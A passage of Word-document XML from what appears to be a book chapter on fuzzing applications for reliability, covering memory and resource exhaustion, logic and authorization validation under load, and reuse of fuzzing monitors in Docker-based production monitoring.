    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your harnesses now monitor three failure conditions simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory corruption (crashes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CPU exhaustion (hangs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory exhaustion (resource depletion)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The exploration strategy remains unchanged: systematic input generation guided by coverage feedback. The monitoring scope expands to catch broader reliability failure patterns.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="82"/>
    <w:bookmarkStart w:id="83" w:name="X22d16632738107fb476b637705fec21673e972c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory Exhaustion in JSON Processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JSON parsing demonstrates memory exhaustion patterns clearly because deeply nested objects can trigger exponential memory allocation during parsing tree construction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply your monitoring extension to JSON processing endpoints that handle user input. Extract the actual JSON parsing code from your application—​don’t test toy examples.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start with legitimate JSON as seeds: actual API payloads your application processes. Let systematic exploration discover pathological variants: deeply nested object structures, arrays with exponential element patterns, string fields designed to stress memory allocation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The monitoring detects when memory consumption grows disproportionately to input size—​indicating potential exhaustion vulnerabilities. Same detection principle as performance monitoring, applied to resource consumption.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="83"/>
    <w:bookmarkStart w:id="84" w:name="X280c2f897cbd5cb6ae09118012c773477244cc4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extending to Caching and Session Systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Caching systems and session storage exhibit different memory exhaustion patterns: gradual accumulation over time rather than immediate spikes. Your monitoring extension adapts to catch these slower patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run campaigns for hours rather than minutes. Generate input sequences that stress resource management: unique cache keys that prevent cleanup, session patterns that accumulate without eviction, error conditions that bypass resource cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor memory trends over time. Healthy caches stabilize at steady-state consumption. Buggy caches grow without bounds until resource exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your systematic approach now covers immediate failures (crashes), performance failures (CPU exhaustion), and resource failures (memory exhaustion) through unified monitoring expansion.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="84"/>
    <w:bookmarkStart w:id="85" w:name="Xa2c84baa2bf7ad58dfad6f839c7f27ec248c9f4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">File and Network Resource Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">File descriptors, network connections, and temporary files represent finite system resources that require careful management. Applications that process user input often create temporary files, establish database connections, or open network sockets as part of their normal operation. Failures in resource cleanup can lead to resource exhaustion that affects not just your application but the entire system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider a file processing service that creates temporary files for each uploaded document. If the cleanup code has a bug that prevents temporary file deletion under certain error conditions, an attacker could gradually fill the filesystem by triggering these error paths repeatedly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Network connection handling presents similar challenges. Database connection pools, HTTP client connections, and message queue connections all require proper lifecycle management. Bugs that prevent connection cleanup can exhaust available connections, preventing new requests from being processed even when the underlying services are available.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your fuzzing approach should generate input sequences that stress resource lifecycle management. Create test cases that trigger error conditions during resource allocation, simulate network failures during connection establishment, and generate malformed input that might prevent proper resource cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor system-level resource usage during fuzzing campaigns: file descriptor counts, active network connections, temporary file accumulation, and disk space consumption. These metrics often provide early warning of resource management failures before they cause complete service failure.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="85"/>
    <w:bookmarkEnd w:id="86"/>
    <w:bookmarkStart w:id="93" w:name="X59cdf40170bbd0f60ce11442865e69e45bdcf09"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logic Validation: Integrating Monitoring into Correctness Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your monitoring extensions detect crashes, CPU exhaustion, and memory exhaustion. Now integrate these capabilities into the most comprehensive reliability testing: validating that your application produces correct results under all input conditions.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="87" w:name="X213c8a3898c30093640da6a87d1f692805a9eef"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unified Reliability Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logic validation combines all previous monitoring techniques into comprehensive correctness testing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Crash monitoring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Ensure input processing doesn’t fail catastrophically</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performance monitoring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Ensure input processing completes within reasonable time</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Resource monitoring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Ensure input processing doesn’t exhaust system resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Correctness validation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Ensure input processing produces expected results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Same systematic exploration. Same harness foundation. Complete reliability coverage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your harnesses now verify complete reliability: input processing that succeeds without crashes, completes within time limits, consumes reasonable resources, AND produces correct results.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This comprehensive approach catches reliability failures that partial testing misses: business logic that works under normal conditions but breaks under resource pressure, state transitions that succeed when CPU is available but fail under load.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="87"/>
    <w:bookmarkStart w:id="88" w:name="X1444d7f59c1783beb9468a38a8eb2360bc7ae47"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">State Machine Logic Under Resource Pressure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Business logic often behaves differently under resource constraints. State transitions that work with adequate CPU and memory may violate business rules when systems are stressed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply your unified monitoring to state machine validation. Test business logic correctness while simultaneously monitoring resource consumption and performance characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start with valid business workflows: order processing sequences, user account lifecycle transitions, document approval chains. Let systematic exploration discover edge cases where resource pressure causes logic failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The critical insight: business logic bugs often emerge only when systems are stressed. Logic that works during normal operation may violate business rules when CPU is exhausted or memory is constrained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your unified monitoring catches these correlation failures: state transitions that violate business rules specifically when resource consumption spikes.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="88"/>
    <w:bookmarkStart w:id="89" w:name="X304ff6401d2d3318537dfeec362ffc73d545b9a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Financial Logic Under Performance Constraints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Financial calculations require absolute correctness regardless of system performance. Mathematical properties must hold even when systems are under resource pressure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test mathematical properties that should always hold:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Credits and debits balance exactly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Currency conversions maintain precision within acceptable bounds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Account balance calculations remain consistent under concurrent access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regulatory constraints hold regardless of system load</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate edge cases that stress both logic and resources: large monetary amounts that consume significant CPU for calculation, high-precision decimal operations that require substantial memory, concurrent financial operations that create resource contention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your unified monitoring ensures financial correctness isn’t compromised by system stress—​catching the correlation failures where business logic breaks specifically under resource pressure.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="89"/>
    <w:bookmarkStart w:id="90" w:name="X8b17c2fafb36edaed08d5eb6aed4180cd00526a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authorization Logic Under System Stress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authorization decisions must remain correct regardless of system performance. Security policies can’t be compromised when systems are under load.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply unified monitoring to authorization logic testing. Validate that permission decisions remain correct even when CPU is exhausted or memory is constrained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The goal: prove that authorization logic maintains security properties under all system conditions, not just during normal operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your systematic exploration with unified monitoring provides comprehensive reliability verification: business logic that handles crashes gracefully, completes within acceptable time, consumes reasonable resources, and produces correct results under all conditions.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="90"/>
    <w:bookmarkStart w:id="91" w:name="X9b131de2bde74459d632bbba5f2600b445a4d62"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Data Validation Logic: Finding the Bypass Bugs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your state machine fuzzer validates workflow logic. Now extend the same approach to data validation—​the rules that prevent invalid data from corrupting your service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Data validation failures don’t crash services. They silently accept invalid input that should have been rejected, allowing corruption to propagate through your system until it causes visible problems downstream.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Focus on the validation boundaries in your application:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Client-side validation that can be bypassed entirely.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Server-side validation that might have implementation bugs.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Database constraints that should catch validation failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your libFuzzer harness generates inputs designed to slip through validation gaps: boundary values that trigger integer overflow in validation checks, Unicode strings that bypass regex validation, type confusion inputs that exploit validation assumptions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The key insight: validation failures often emerge at the boundaries between different validation systems. Input that passes client-side validation but fails server-side validation. Data that satisfies server validation but violates database constraints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate test cases that specifically target these boundary conditions using the same systematic exploration approach from your crash detection work in Chapters 1 and 2.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="91"/>
    <w:bookmarkStart w:id="92" w:name="Xf1bd801f55e45ad902eb7304c754f0a236bae64"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Business Rule Enforcement and Authorization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authorization and business rule enforcement systems must correctly implement complex policies that determine what operations users can perform under what circumstances. These systems often contain intricate logic that considers user roles, resource ownership, time-based restrictions, and contextual factors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logic failures in authorization systems can allow users to access resources they shouldn’t, perform operations beyond their authorized scope, or bypass business rules that enforce regulatory compliance. These failures often don’t trigger obvious error conditions—​the system continues operating normally while processing unauthorized operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your fuzzing approach should generate authorization test scenarios that stress policy enforcement logic. Create test cases with different user roles, resource ownership patterns, and contextual factors that might expose assumptions in the authorization implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Focus on edge cases where multiple authorization rules interact: users with overlapping roles, resources with complex ownership hierarchies, and time-based restrictions that might create windows of unauthorized access. These complex scenarios often expose logic bugs that simple authorization tests miss.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="92"/>
    <w:bookmarkEnd w:id="93"/>
    <w:bookmarkStart w:id="97" w:name="X0623aea24de3f175d5273dcaa3461483c9357b7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resource Management and Connection Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modern applications depend heavily on external resources: database connections, message queues, external API services, and distributed caches. Each of these dependencies represents a potential point of failure where resource management bugs can cause service degradation or complete outages.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="94" w:name="X38ae4bf16d755c134342512a76f5323c50d44b1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connection Pool Exhaustion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Database connection pools provide a classic example of resource management that can fail under adversarial conditions. Applications typically maintain a fixed number of database connections to balance performance with resource consumption. Under normal conditions, connections are borrowed from the pool for brief operations then returned for reuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, bugs in connection lifecycle management can prevent connections from being returned to the pool. Long-running transactions that don’t commit properly, error conditions that bypass connection cleanup code, and race conditions in multi-threaded applications can all lead to connection pool exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When the connection pool becomes exhausted, new requests can’t obtain database connections and must either fail immediately or queue waiting for connections to become available. This creates a cascading failure where application response times increase dramatically, request queues grow, and the service becomes effectively unavailable even though the underlying database is functioning correctly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your fuzzing strategy should generate operation sequences that stress connection lifecycle management. Create test cases that trigger database errors during transaction processing, simulate network failures during connection establishment, and generate rapid sequences of database operations that might overwhelm connection cleanup logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor connection pool metrics during fuzzing campaigns: active connections, queued requests, connection establishment failures, and connection lifetime statistics. These metrics often provide early warning of connection management issues before they cause complete service failure.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="94"/>
    <w:bookmarkStart w:id="95" w:name="X361c4d90a23eca9f3339be889d7448876ecbaf3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Message Queue and Event Processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Distributed applications often use message queues and event processing systems to handle asynchronous operations and inter-service communication. These systems typically implement sophisticated resource management policies to handle message acknowledgment, retry logic, and dead letter processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logic failures in message processing can create resource exhaustion scenarios where messages accumulate faster than they can be processed, queues grow without bounds, and the entire event processing system becomes overwhelmed. These failures often manifest gradually as message backlogs build up over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your fuzzing approach should generate message sequences that stress event processing logic. Create test cases that trigger processing failures, generate high-volume message bursts that overwhelm processing capacity, and simulate network failures that prevent message acknowledgment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Focus particularly on error handling and retry logic. Message processing systems often implement complex policies for handling failed messages, including exponential backoff, dead letter queues, and circuit breaker patterns. Bugs in these systems can cause resource exhaustion when error conditions prevent proper message cleanup.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="95"/>
    <w:bookmarkStart w:id="96" w:name="Xa278808ea8b18b29288b31d6ee2417352072a08"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">External Service Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modern applications integrate with numerous external services: payment processors, authentication providers, content delivery networks, and third-party APIs. Each integration represents a potential source of resource management failures when the external service becomes unavailable or responds with unexpected error conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Timeout handling, retry logic, and circuit breaker implementations all require careful resource management to prevent cascade failures when external services degrade. Bugs in these systems can cause applications to consume excessive resources waiting for unresponsive services or to overwhelm external services with retry attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your fuzzing strategy should simulate various external service failure modes: complete unavailability, slow responses, intermittent failures, and malformed responses. Generate test cases that stress timeout handling, retry logic, and circuit breaker implementations under these failure conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor resource consumption during external service integration testing: active connections to external services, queued requests waiting for responses, timeout occurrences, and retry attempt frequencies. These metrics help identify resource management failures before they cause application-wide issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your logic failure detection now covers state machine validation and data validation bypass discovery, both built on your established libFuzzer-plus-Docker foundation. These techniques catch the subtle failures that don’t crash but corrupt data and violate business rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Time to integrate everything with production monitoring.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="96"/>
    <w:bookmarkEnd w:id="97"/>
    <w:bookmarkStart w:id="103" w:name="X9b66f1849abafa2dda7e0f5c9580e095ab61a08"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Production Integration: Docker-Native Reliability Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your fuzzing discoveries mean nothing if you can’t detect similar failures in production. The ReDoS patterns, memory exhaustion scenarios, and logic failures you’ve found through systematic testing need corresponding monitoring that catches these issues before they impact customers.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="98" w:name="X90645e363b39084c084d91ec518f38445a39225"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Container-Based Performance Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy the same monitoring containers you built for fuzzing campaigns alongside your production services. Same Docker images. Same monitoring techniques. Different data sources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your fuzzing campaigns established baseline performance characteristics for legitimate operations. Use these baselines to configure production monitoring thresholds. Request processing that exceeds CPU time limits you discovered during ReDoS testing. Memory growth patterns that match the exhaustion scenarios you found through systematic exploration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The advantage of container-based monitoring: consistency between testing and production environments. Your monitoring infrastructure uses the same Docker images, same performance measurement techniques, same alerting thresholds developed during fuzzing campaigns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy monitoring sidecars that track the same metrics you measured during fuzzing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CPU time per request (ReDoS detection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Memory allocation patterns (exhaustion detection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resource pool utilization (connection monitoring)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
